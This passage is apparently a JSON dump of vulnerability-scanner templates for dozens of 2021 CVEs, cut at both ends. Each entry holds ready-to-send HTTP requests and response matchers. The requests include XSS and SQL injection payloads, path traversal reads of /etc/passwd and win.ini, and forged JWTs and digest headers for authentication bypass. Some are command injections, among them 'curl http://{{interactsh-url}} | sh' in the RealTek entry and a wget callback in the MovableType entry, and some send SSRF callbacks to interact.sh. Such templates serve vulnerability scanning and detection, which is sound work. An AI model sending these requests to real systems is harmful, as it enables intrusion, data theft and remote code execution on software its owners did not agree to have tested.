Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35395","info":{"name":"RealTek Jungle SDK - Arbitrary Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/formWsc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35323","info":{"name":"Bludit 3.13.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"Bludit\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"tokenCSRF","part":"body","group":1,"regex":["type=\"hidden\" id=\"jstokenCSRF\" name=\"tokenCSRF\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-40651","info":{"name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, \"openSIS\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd","{{BaseURL}}/api/geojson?url=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44910","info":{"name":"SpringBlade - Information Leakage","severity":"high"},"requests":[{"raw":["GET /api/blade-user/user-list HTTP/1.1\nHost: {{Hostname}}\nBlade-Auth: bearer {{bearer}}\n"],"payloads":{"bearer":["eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.kol9scDVwLDE8U3mM_j8O4UYrpdUc9_Zw935g7Nb979DfRuanai1UeKsK2zCKuR77Otryi0sGzBfGANDbLseBg"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"account\":","\"password\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-38147","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(header, 'application/vnd.openxml', 'attachment; filename=')","contains(body, '<?xml version=')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-33690","info":{"name":"SAP NetWeaver Development Infrastructure - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /tc.CBS.Appl/tcspseudo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Could not connect to the CBS"]}]}]},{"id":"CVE-2021-22707","info":{"name":"EVlink City < R8 V3.4.0.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["?worker=Cluster\" name=\"cluster\" id=\"id_cluster"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site 